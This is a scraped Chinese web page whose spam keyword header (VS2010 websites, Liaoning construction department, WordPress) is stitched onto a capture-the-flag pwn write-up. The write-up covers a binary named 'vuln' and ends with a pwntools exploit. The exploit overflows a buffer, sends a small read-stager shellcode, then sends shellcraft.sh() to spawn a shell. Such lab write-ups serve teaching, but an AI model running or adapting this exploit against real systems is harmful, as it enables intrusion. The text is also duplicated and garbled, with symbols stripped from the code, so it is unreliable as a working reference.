怎么用vs2010做网站,现在建站好么,辽宁建设厅,wordpress edit1.vuln 这是主函数#xff0c;数一下就发现可以溢出最后的0x4008d0 然后会执行到这里#xff0c;逻辑就是在v0上写shellcode#xff0c;不过执行写0x10#xff0c;不够sh#xff0c;很明显要先read。
以下是exp:
from pwn import *
context.archamd64
ioprocess(./vuln)…1.vuln 这是主函数数一下就发现可以溢出最后的0x4008d0 然后会执行到这里逻辑就是在v0上写shellcode不过执行写0x10不够sh很明显要先read。
以下是exp:
from pwn import *
context.archamd64
ioprocess(./vuln)
io.recvuntil(binput name:\n)
io.sendline(ba*39)
#gdb.attach(io)
#pause()
io.recv()
shellxor rdi,rdi;lea rsi,[rdx0x9];syscall;
print(len(asm(shell)))
io.sendline(asm(shell))
#gdb.attach(io)
#pause()
io.sendline(asm(shellcraft.sh()))
io.interactive()